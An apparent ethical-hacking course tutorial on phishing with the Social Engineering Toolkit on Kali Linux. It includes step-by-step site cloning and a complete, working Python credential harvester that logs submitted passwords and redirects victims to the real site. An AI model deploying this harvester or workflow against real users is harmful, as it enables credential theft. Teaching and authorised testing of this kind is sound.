Hands-on: Phishing Attack Simulation
This page explains and walks through a phishing attack simulation on Kali Linux 2024.3, as used in an ethical hacking course.
Phishing Attack Overview
Phishing is a social engineering attack in which an attacker tricks a victim into handing over sensitive information such as usernames, passwords, or credit card details, typically through a fake website that imitates a legitimate one. This simulation uses the Social Engineering Toolkit (SET), which ships preinstalled on Kali Linux.
Hands-on Steps: Phishing Attack Simulation on Kali Linux 2024.3
1. Open Kali Linux and Run Social Engineering Toolkit (SET)
SET is a menu-driven tool for simulating social engineering attacks such as phishing. It needs root privileges (it binds the phishing server to a privileged port), so start it with sudo:
sudo setoolkit
The SET menu appears with several options. Select option 1, Social-Engineering Attacks. The option numbers below match SET as shipped with Kali 2024.3; if your menu differs, go by the option names rather than the numbers.
2. Select Website Attack Vectors
In the SET main menu, select option 2 for *Website Attack Vectors*:
2) Website Attack Vectors
3. Select Credential Harvester Attack Method
Next, select the Credential Harvester method:
3) Credential Harvester Attack Method
This method serves a copy of a login page and records every form field (username, password, and anything else) that the victim submits to it.
4. Select Site Cloner
To create a fake site that looks like the original site, select the Site Cloner option:
2) Site Cloner
5. Enter Target URL
After selecting Site Cloner, you are asked to enter the URL of the site you want to clone (e.g., Facebook login page, Gmail, etc.). For example, to fake the Gmail login page, type:
6. IP Address Configuration
SET asks for the IP address of your phishing server, that is, the address the victim's browser will connect to and POST the form back to. This must be an address the target can actually reach: in a lab it is the LAN address of the Kali machine; for a target outside your network it would have to be a public address or a port forward. To find the Kali machine's address, run:
ifconfig
(ifconfig comes from the net-tools package; if it is not present, the ip command from iproute2 shows the same addresses.) Enter the address into SET when prompted.
7. Start Phishing Server
Once the configuration is complete, SET starts a local web server (port 80 by default) that serves the cloned page to the target. Every time the victim visits the phishing URL and submits the login form, SET captures the posted fields and then redirects the browser to the real site, so the failed login looks like an ordinary mistake. Note that the clone is served over plain HTTP from a bare IP address, which modern browsers flag as "Not secure"; a realistic assessment would also address the URL and certificate the target sees.
8. Simulate Attack
- Send the generated URL to the target via email, message, or other method. Make sure you have the target's permission, as this is part of ethical hacking.
- When the victim visits the fake site and enters their credentials, this information will be captured by SET and displayed in your Kali Linux terminal.
9. Capture and Display Credentials
On the SET screen you will see output along these lines (illustrative, not verbatim) each time a form is submitted:
[*] WE GOT A HIT! POST Data: user=exampleuser&pass=examplepassword
Here the username and password entered on the fake login page have been captured. When you stop the server with Ctrl-C, SET also writes a report of the harvested data to its reports directory under the home directory of the account running it (.set/reports by default), so check and clean up that file at the end of the exercise.
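To make clear what the Credential Harvester is actually doing behind SET's menus, here is a minimal harvester written as an added example for this page; it is not SET's own code. It serves a constructed stand-in for the cloned login form, parses the POSTed body, guesses which fields are the username and password using simple name heuristics (the same idea SET uses when it prints "possible username/password field"), logs the hit, and redirects the browser to an assumed real site (https://example.com/login). The form HTML, the hint lists, and the redirect target are all assumptions. Run it only against systems you are authorised to test.

```python
"""Minimal credential-harvester mechanics, modelled on SET's Credential
Harvester. Added example for this page, not SET's code.
Run it only on systems you are authorised to test."""
from datetime import datetime, timezone
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs

# Constructed stand-in for a cloned login page; SET would copy the real HTML.
FAKE_LOGIN_HTML = b"""<html><body>
<form method="POST" action="/">
  <input name="email" type="text">
  <input name="pass" type="password">
  <input type="submit" value="Sign in">
</form></body></html>"""

# Assumed redirect target: the real site the clone imitates.
REDIRECT_TO = "https://example.com/login"

# Assumed field-name hints used to guess the credential fields.
USERNAME_HINTS = ("user", "login", "email", "name", "uid")
PASSWORD_HINTS = ("pass", "pwd", "secret")

HARVEST_LOG = []  # in-memory log; SET writes a report file instead


def parse_post_body(body: bytes) -> dict:
    """Decode an application/x-www-form-urlencoded body into {field: value}.

    parse_qs returns lists; a login form has one value per field, so keep
    the first. keep_blank_values keeps empty fields visible in the log.
    """
    raw = parse_qs(body.decode("utf-8", errors="replace"), keep_blank_values=True)
    return {field: values[0] for field, values in raw.items()}


def classify_fields(params: dict) -> dict:
    """Guess which fields carry the username and the password.

    Password hints are checked first so a field such as "password_user" is
    not mistaken for a username. Returns {'username': ..., 'password': ...},
    each a (field, value) tuple or None if nothing matched.
    """
    found = {"username": None, "password": None}
    for field, value in params.items():
        lowered = field.lower()
        if found["password"] is None and any(h in lowered for h in PASSWORD_HINTS):
            found["password"] = (field, value)
        elif found["username"] is None and any(h in lowered for h in USERNAME_HINTS):
            found["username"] = (field, value)
    return found


def record_hit(client_ip: str, body: bytes) -> dict:
    """Parse one POST, classify it, append it to HARVEST_LOG and return the entry."""
    params = parse_post_body(body)
    guess = classify_fields(params)
    entry = {
        "time": datetime.now(timezone.utc).isoformat(),
        "client": client_ip,
        "params": params,
        "username": guess["username"],
        "password": guess["password"],
    }
    HARVEST_LOG.append(entry)
    return entry


class HarvesterHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Serve the cloned page to anyone who follows the phishing link.
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(FAKE_LOGIN_HTML)

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        entry = record_hit(self.client_address[0], self.rfile.read(length))
        print(f"[*] WE GOT A HIT from {entry['client']}: {entry['params']}")
        # Send the victim on to the real site so the failed login looks ordinary.
        self.send_response(302)
        self.send_header("Location", REDIRECT_TO)
        self.end_headers()


if __name__ == "__main__":
    # Like SET, listen on port 80 (needs root); use a high port for unprivileged tests.
    HTTPServer(("0.0.0.0", 80), HarvesterHandler).serve_forever()
```

The two things worth noticing are that the server never needs to know anything about the real site beyond its HTML and where to redirect, and that the field heuristics are only guesses: a form that names its fields oddly still gets logged in full under `params`, which is why SET prints every parameter as well as its guess.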
Ethical Practices
Phishing is a dangerous technique if misused. In the context of ethical hacking, this simulation must only be run with explicit, written permission from the owner of the systems and the people being tested, within an agreed scope, and for educational or security testing purposes. Credentials captured during the exercise are sensitive data: do not reuse them, and delete the SET reports once the results have been reported.
Conclusion
The phishing attack simulation using Kali Linux 2024.3 and the Social Engineering Toolkit (SET) gives a realistic view of how such an attack is carried out and how little infrastructure it requires. It is a practical way to learn the key aspects of social engineering and to raise security awareness among users.